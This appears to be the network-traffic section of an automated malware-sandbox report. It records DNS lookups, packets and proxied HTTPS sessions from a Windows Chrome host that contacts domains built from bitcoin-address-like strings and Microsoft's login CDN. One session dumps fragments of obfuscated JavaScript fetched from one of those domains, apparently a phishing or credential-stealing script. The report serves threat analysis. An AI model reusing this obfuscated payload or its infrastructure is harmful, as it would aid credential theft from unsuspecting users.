Apr 26, 2024 18:01:15.205557108 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:01:15.205637932 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:02:02.399053097 CEST	49768	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:02:02.399101973 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:02:02.399214029 CEST	49768	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:02:02.399821997 CEST	49768	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:02:02.399851084 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:02:02.729510069 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:02:02.758917093 CEST	49768	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:02:02.758943081 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:02:02.759701967 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:02:02.760243893 CEST	49768	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:02:02.760371923 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:02:02.808737040 CEST	49768	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:02:12.715840101 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:02:12.715903044 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:02:12.715965033 CEST	49768	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:02:13.141985893 CEST	49768	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:02:13.142016888 CEST	443	49768	142.250.217.196	192.168.2.4
Apr 26, 2024 18:03:02.567281961 CEST	49769	443	192.168.2.4	142.250.64.196
Apr 26, 2024 18:03:02.567369938 CEST	443	49769	142.250.64.196	192.168.2.4
Apr 26, 2024 18:03:02.567456007 CEST	49769	443	192.168.2.4	142.250.64.196
Apr 26, 2024 18:03:02.568077087 CEST	49769	443	192.168.2.4	142.250.64.196
Apr 26, 2024 18:03:02.568125010 CEST	443	49769	142.250.64.196	192.168.2.4
Apr 26, 2024 18:03:02.923099041 CEST	443	49769	142.250.64.196	192.168.2.4
Apr 26, 2024 18:03:02.923407078 CEST	49769	443	192.168.2.4	142.250.64.196
Apr 26, 2024 18:03:02.923469067 CEST	443	49769	142.250.64.196	192.168.2.4
Apr 26, 2024 18:03:02.923873901 CEST	443	49769	142.250.64.196	192.168.2.4
Apr 26, 2024 18:03:02.924278021 CEST	49769	443	192.168.2.4	142.250.64.196
Apr 26, 2024 18:03:02.924376965 CEST	443	49769	142.250.64.196	192.168.2.4
Apr 26, 2024 18:03:02.965572119 CEST	49769	443	192.168.2.4	142.250.64.196

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 17:59:58.250840902 CEST	57131	53	192.168.2.4	1.1.1.1
Apr 26, 2024 17:59:58.251068115 CEST	54414	53	192.168.2.4	1.1.1.1
Apr 26, 2024 17:59:58.280946970 CEST	53	53937	1.1.1.1	192.168.2.4
Apr 26, 2024 17:59:58.374593973 CEST	53	60909	1.1.1.1	192.168.2.4
Apr 26, 2024 17:59:58.516931057 CEST	53	54414	1.1.1.1	192.168.2.4
Apr 26, 2024 17:59:58.517038107 CEST	53	57131	1.1.1.1	192.168.2.4
Apr 26, 2024 17:59:58.831932068 CEST	51452	53	192.168.2.4	8.8.8.8
Apr 26, 2024 17:59:58.832240105 CEST	62907	53	192.168.2.4	1.1.1.1
Apr 26, 2024 17:59:58.957237959 CEST	53	62907	1.1.1.1	192.168.2.4
Apr 26, 2024 17:59:59.006037951 CEST	53	51452	8.8.8.8	192.168.2.4
Apr 26, 2024 17:59:59.543181896 CEST	53	59046	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:02.285103083 CEST	55913	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:02.285525084 CEST	53274	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:02.338424921 CEST	53135	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:02.339318991 CEST	59819	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:02.419946909 CEST	53	55913	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:02.419971943 CEST	53	53274	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:02.464616060 CEST	53	53135	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:02.464639902 CEST	53	59819	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:02.487034082 CEST	53	54112	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:03.216348886 CEST	56326	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:03.216826916 CEST	51321	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:03.268893003 CEST	62109	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:03.269450903 CEST	61607	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:03.292484045 CEST	53	62799	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:03.345784903 CEST	53	56326	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:03.345824957 CEST	53	51321	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:03.663496017 CEST	53	62109	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:03.692658901 CEST	53	61607	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:10.451265097 CEST	53	59601	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:10.467087030 CEST	64243	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:10.467571974 CEST	50015	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:10.592050076 CEST	53	64243	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:10.592962027 CEST	53	50015	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:11.643925905 CEST	58556	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:11.644314051 CEST	49889	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:00:11.903247118 CEST	53	58556	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:12.071223974 CEST	53	49889	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:18.829778910 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 18:00:20.126012087 CEST	53	51627	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:39.211899042 CEST	53	57998	1.1.1.1	192.168.2.4
Apr 26, 2024 18:00:58.018717051 CEST	53	60424	1.1.1.1	192.168.2.4
Apr 26, 2024 18:01:02.136792898 CEST	53	59905	1.1.1.1	192.168.2.4
Apr 26, 2024 18:01:27.348335028 CEST	53	57832	1.1.1.1	192.168.2.4
Apr 26, 2024 18:02:14.304506063 CEST	53	55948	1.1.1.1	192.168.2.4
Apr 26, 2024 18:03:02.436532021 CEST	61031	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:03:02.436954021 CEST	57681	53	192.168.2.4	1.1.1.1
Apr 26, 2024 18:03:02.564662933 CEST	53	61031	1.1.1.1	192.168.2.4
Apr 26, 2024 18:03:02.564719915 CEST	53	57681	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 17:59:58.250840902 CEST	192.168.2.4	1.1.1.1	0x385b	Standard query (0)	bc1q2a22gd79umarrlvhudct2v5.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:58.251068115 CEST	192.168.2.4	1.1.1.1	0xf68f	Standard query (0)	bc1q2a22gd79umarrlvhudct2v5.com	65	IN (0x0001)	false
Apr 26, 2024 17:59:58.831932068 CEST	192.168.2.4	8.8.8.8	0x8a88	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:58.832240105 CEST	192.168.2.4	1.1.1.1	0xd9c	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:02.285103083 CEST	192.168.2.4	1.1.1.1	0x7039	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:02.285525084 CEST	192.168.2.4	1.1.1.1	0xfcda	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 26, 2024 18:00:02.338424921 CEST	192.168.2.4	1.1.1.1	0x6b09	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:02.339318991 CEST	192.168.2.4	1.1.1.1	0xab3	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Apr 26, 2024 18:00:03.216348886 CEST	192.168.2.4	1.1.1.1	0x1f7e	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:03.216826916 CEST	192.168.2.4	1.1.1.1	0x9b44	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Apr 26, 2024 18:00:03.268893003 CEST	192.168.2.4	1.1.1.1	0xaaf9	Standard query (0)	bc1qusz5l7h87pd2v6sv45nz82s.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:03.269450903 CEST	192.168.2.4	1.1.1.1	0x5a16	Standard query (0)	bc1qusz5l7h87pd2v6sv45nz82s.com	65	IN (0x0001)	false
Apr 26, 2024 18:00:10.467087030 CEST	192.168.2.4	1.1.1.1	0x4c43	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:10.467571974 CEST	192.168.2.4	1.1.1.1	0x2a04	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Apr 26, 2024 18:00:11.643925905 CEST	192.168.2.4	1.1.1.1	0x81be	Standard query (0)	bc1qusz5l7h87pd2v6sv45nz82s.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:11.644314051 CEST	192.168.2.4	1.1.1.1	0xfe94	Standard query (0)	bc1qusz5l7h87pd2v6sv45nz82s.com	65	IN (0x0001)	false
Apr 26, 2024 18:03:02.436532021 CEST	192.168.2.4	1.1.1.1	0x3ecc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:03:02.436954021 CEST	192.168.2.4	1.1.1.1	0xbaf9	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 17:59:58.517038107 CEST	1.1.1.1	192.168.2.4	0x385b	No error (0)	bc1q2a22gd79umarrlvhudct2v5.com		185.216.70.216	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:58.957237959 CEST	1.1.1.1	192.168.2.4	0xd9c	No error (0)	google.com		192.178.50.46	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:59.006037951 CEST	8.8.8.8	192.168.2.4	0x8a88	No error (0)	google.com		142.250.113.102	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:59.006037951 CEST	8.8.8.8	192.168.2.4	0x8a88	No error (0)	google.com		142.250.113.113	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:59.006037951 CEST	8.8.8.8	192.168.2.4	0x8a88	No error (0)	google.com		142.250.113.139	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:59.006037951 CEST	8.8.8.8	192.168.2.4	0x8a88	No error (0)	google.com		142.250.113.138	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:59.006037951 CEST	8.8.8.8	192.168.2.4	0x8a88	No error (0)	google.com		142.250.113.100	A (IP address)	IN (0x0001)	false
Apr 26, 2024 17:59:59.006037951 CEST	8.8.8.8	192.168.2.4	0x8a88	No error (0)	google.com		142.250.113.101	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:02.419946909 CEST	1.1.1.1	192.168.2.4	0x7039	No error (0)	www.google.com		142.250.217.196	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:02.419971943 CEST	1.1.1.1	192.168.2.4	0xfcda	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 26, 2024 18:00:02.464616060 CEST	1.1.1.1	192.168.2.4	0x6b09	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:02.464616060 CEST	1.1.1.1	192.168.2.4	0x6b09	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:02.464639902 CEST	1.1.1.1	192.168.2.4	0xab3	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Apr 26, 2024 18:00:03.345784903 CEST	1.1.1.1	192.168.2.4	0x1f7e	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 18:00:03.345784903 CEST	1.1.1.1	192.168.2.4	0x1f7e	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:03.345824957 CEST	1.1.1.1	192.168.2.4	0x9b44	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 18:00:03.663496017 CEST	1.1.1.1	192.168.2.4	0xaaf9	No error (0)	bc1qusz5l7h87pd2v6sv45nz82s.com		185.216.70.6	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:10.592050076 CEST	1.1.1.1	192.168.2.4	0x4c43	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 18:00:10.592050076 CEST	1.1.1.1	192.168.2.4	0x4c43	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:00:10.592962027 CEST	1.1.1.1	192.168.2.4	0x2a04	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 18:00:11.903247118 CEST	1.1.1.1	192.168.2.4	0x81be	No error (0)	bc1qusz5l7h87pd2v6sv45nz82s.com		185.216.70.6	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:03:02.564662933 CEST	1.1.1.1	192.168.2.4	0x3ecc	No error (0)	www.google.com		142.250.64.196	A (IP address)	IN (0x0001)	false
Apr 26, 2024 18:03:02.564719915 CEST	1.1.1.1	192.168.2.4	0xbaf9	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

bc1q2a22gd79umarrlvhudct2v5.com

cdnjs.cloudflare.com

aadcdn.msftauth.net

bc1qusz5l7h87pd2v6sv45nz82s.com

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	185.216.70.216	443	5316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:59:59 UTC	595	OUT	GET /lnk/cloud.js HTTP/1.1 Host: bc1q2a22gd79umarrlvhudct2v5.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 15:59:59 UTC	289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:59:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sun, 21 Apr 2024 18:25:35 GMT ETag: "1e560-6169f72660139" Accept-Ranges: bytes Content-Length: 124256 Vary: Accept-Encoding Connection: close Content-Type: application/javascript
2024-04-26 15:59:59 UTC	16384	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 32 32 36 28 5f 30 78 39 35 64 61 36 66 2c 5f 30 78 34 61 37 31 39 37 29 7b 76 61 72 20 5f 30 78 34 35 34 36 34 3d 5f 30 78 63 39 34 34 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 32 32 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 31 30 64 39 61 2c 5f 30 78 34 30 35 30 61 32 29 7b 5f 30 78 32 31 30 64 39 61 3d 5f 30 78 32 31 30 64 39 61 2d 28 2d 30 78 39 66 35 2b 30 78 63 34 32 2b 2d 30 78 31 33 34 29 3b 76 61 72 20 5f 30 78 33 33 36 31 38 66 3d 5f 30 78 34 35 34 36 34 5b 5f 30 78 32 31 30 64 39 61 5d 3b 72 65 74 75 72 6e 20 5f 30 78 33 33 36 31 38 66 3b 7d 2c 5f 30 78 32 32 32 36 28 5f 30 78 39 35 64 61 36 66 2c 5f 30 78 34 61 37 31 39 37 29 3b 7d 76 61 72 20 5f 30 78 32 30 33 35 36 32 3d 5f 30 78 32 32 32 36 3b 66 75 Data Ascii: function _0x2226(_0x95da6f,_0x4a7197){var _0x45464=_0xc944();return _0x2226=function(_0x210d9a,_0x4050a2){_0x210d9a=_0x210d9a-(-0x9f5+0xc42+-0x134);var _0x33618f=_0x45464[_0x210d9a];return _0x33618f;},_0x2226(_0x95da6f,_0x4a7197);}var _0x203562=_0x2226;fu
2024-04-26 15:59:59 UTC	16384	IN	Data Raw: 25 37 35 25 36 35 27 2c 27 34 31 25 37 31 25 36 41 25 34 27 2c 27 34 31 25 35 30 25 34 36 25 34 27 2c 27 25 36 31 25 33 38 25 35 45 25 27 2c 27 25 36 45 25 37 34 25 36 36 25 27 2c 27 25 33 33 25 36 35 25 33 38 25 27 2c 27 25 36 32 25 36 31 25 36 33 25 27 2c 27 36 25 33 44 25 32 32 25 35 38 27 2c 27 39 25 37 36 25 33 45 25 33 43 27 2c 27 33 45 25 37 34 25 36 38 25 36 27 2c 27 36 37 25 32 39 25 37 44 25 37 27 2c 27 36 31 25 36 34 25 36 39 25 36 27 2c 27 36 39 25 36 45 25 36 45 25 36 27 2c 27 32 32 25 33 45 25 30 41 25 30 27 2c 27 25 36 33 25 32 44 25 36 32 25 27 2c 27 43 25 35 32 25 34 34 25 35 38 27 2c 27 25 33 33 25 33 31 25 33 33 25 27 2c 27 25 36 39 25 36 44 25 36 31 25 27 2c 27 33 25 37 41 25 36 45 25 37 32 27 2c 27 25 36 44 25 36 35 25 36 45 25 27 2c Data Ascii: %75%65','41%71%6A%4','41%50%46%4','%61%38%5E%','%6E%74%66%','%33%65%38%','%62%61%63%','6%3D%22%58','9%76%3E%3C','3E%74%68%6','67%29%7D%7','61%64%69%6','69%6E%6E%6','22%3E%0A%0','%63%2D%62%','C%52%44%58','%33%31%33%','%69%6D%61%','3%7A%6E%72','%6D%65%6E%',
2024-04-26 16:00:00 UTC	16384	IN	Data Raw: 2c 27 44 25 36 44 25 37 33 25 36 37 27 2c 27 35 30 25 33 34 25 33 34 25 36 27 2c 27 31 25 36 34 25 36 39 25 36 45 27 2c 27 25 33 39 25 33 35 25 36 33 25 27 2c 27 36 25 36 31 25 33 38 25 32 38 27 2c 27 31 25 37 30 25 33 41 25 37 37 27 2c 27 45 25 33 31 25 33 35 25 33 42 27 2c 27 25 36 36 25 32 43 25 32 37 25 27 2c 27 25 37 30 25 37 30 25 36 43 25 27 2c 27 34 25 33 41 25 33 31 25 32 45 27 2c 27 25 32 39 25 32 39 25 32 46 25 27 2c 27 37 32 25 36 39 25 36 45 25 36 27 2c 27 25 32 35 25 33 42 25 36 44 25 27 2c 27 25 30 39 25 33 43 25 36 34 25 27 2c 27 39 25 36 45 25 37 34 25 32 38 27 2c 27 25 36 46 25 36 43 25 36 46 25 27 2c 27 45 25 33 35 25 37 32 25 36 35 27 2c 27 37 30 25 36 43 25 36 39 25 36 27 2c 27 30 39 25 32 30 25 32 30 25 33 27 2c 27 36 37 25 36 46 25 Data Ascii: ,'D%6D%73%67','50%34%34%6','1%64%69%6E','%39%35%63%','6%61%38%28','1%70%3A%77','E%31%35%3B','%66%2C%27%','%70%70%6C%','4%3A%31%2E','%29%29%2F%','72%69%6E%6','%25%3B%6D%','%09%3C%64%','9%6E%74%28','%6F%6C%6F%','E%35%72%65','70%6C%69%6','09%20%20%3','67%6F%
2024-04-26 16:00:00 UTC	16384	IN	Data Raw: 30 78 38 39 34 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 65 61 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 33 64 34 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 37 31 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 36 62 38 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 30 66 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 38 62 37 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 32 30 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 36 62 61 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 64 39 37 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 32 62 66 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 32 63 36 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 64 37 39 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 33 37 39 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 36 36 64 29 2b 5f 30 78 32 30 33 35 36 32 28 Data Ascii: 0x894)+_0x203562(0x7ea)+_0x203562(0x3d4)+_0x203562(0x771)+_0x203562(0x6b8)+_0x203562(0xc0f)+_0x203562(0x8b7)+_0x203562(0xc20)+_0x203562(0x6ba)+_0x203562(0xd97)+_0x203562(0x2bf)+_0x203562(0x2c6)+_0x203562(0xd79)+_0x203562(0x379)+_0x203562(0x66d)+_0x203562(
2024-04-26 16:00:00 UTC	16384	IN	Data Raw: 32 30 33 35 36 32 28 30 78 36 35 37 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 39 33 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 39 62 32 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 61 33 66 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 30 34 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 34 64 36 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 36 64 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 31 39 34 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 38 37 63 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 32 66 66 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 65 39 36 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 65 35 36 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 33 31 37 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 61 31 35 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 64 63 38 29 2b 5f 30 78 Data Ascii: 203562(0x657)+_0x203562(0x793)+_0x203562(0x9b2)+_0x203562(0xa3f)+_0x203562(0xc04)+_0x203562(0x4d6)+_0x203562(0xc6d)+_0x203562(0x194)+_0x203562(0x87c)+_0x203562(0x2ff)+_0x203562(0xe96)+_0x203562(0xe56)+_0x203562(0x317)+_0x203562(0xa15)+_0x203562(0xdc8)+_0x
2024-04-26 16:00:00 UTC	16384	IN	Data Raw: 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 34 62 37 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 35 62 61 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 38 35 36 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 39 31 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 63 65 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 35 34 31 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 62 61 66 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 38 35 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 64 38 37 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 61 38 31 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 32 30 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 37 33 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 36 38 34 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 34 39 35 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 33 65 39 Data Ascii: )+_0x203562(0x4b7)+_0x203562(0x5ba)+_0x203562(0x856)+_0x203562(0xc91)+_0x203562(0x7ce)+_0x203562(0x541)+_0x203562(0xbaf)+_0x203562(0xc85)+_0x203562(0xd87)+_0x203562(0xa81)+_0x203562(0x720)+_0x203562(0xc73)+_0x203562(0x684)+_0x203562(0x495)+_0x203562(0x3e9
2024-04-26 16:00:00 UTC	16384	IN	Data Raw: 32 28 30 78 63 30 65 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 39 65 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 32 35 61 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 32 64 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 39 39 64 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 35 65 34 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 35 37 66 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 61 65 39 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 38 32 65 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 31 37 62 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 33 36 30 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 32 64 31 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 64 62 32 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 32 34 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 32 34 38 29 2b 5f 30 78 32 30 33 35 36 Data Ascii: 2(0xc0e)+_0x203562(0xc9e)+_0x203562(0x25a)+_0x203562(0x72d)+_0x203562(0x99d)+_0x203562(0x5e4)+_0x203562(0x57f)+_0x203562(0xae9)+_0x203562(0x82e)+_0x203562(0x17b)+_0x203562(0x360)+_0x203562(0x2d1)+_0x203562(0xdb2)+_0x203562(0x724)+_0x203562(0x248)+_0x20356
2024-04-26 16:00:00 UTC	9568	IN	Data Raw: 32 30 33 35 36 32 28 30 78 31 66 32 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 62 65 34 29 29 2b 28 5f 30 78 32 30 33 35 36 32 28 30 78 34 63 36 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 38 34 32 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 65 35 31 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 38 33 61 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 34 38 62 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 30 31 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 32 36 35 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 35 39 61 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 33 64 31 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 63 37 63 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 61 35 62 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 37 64 34 29 2b 5f 30 78 32 30 33 35 36 32 28 30 78 61 39 31 29 2b 5f Data Ascii: 203562(0x1f2)+_0x203562(0xbe4))+(_0x203562(0x4c6)+_0x203562(0x842)+_0x203562(0xe51)+_0x203562(0x83a)+_0x203562(0x48b)+_0x203562(0x701)+_0x203562(0x265)+_0x203562(0x59a)+_0x203562(0x3d1)+_0x203562(0xc7c)+_0x203562(0xa5b)+_0x203562(0x7d4)+_0x203562(0xa91)+_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.17.24.14	443	5316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:02 UTC	608	OUT	GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
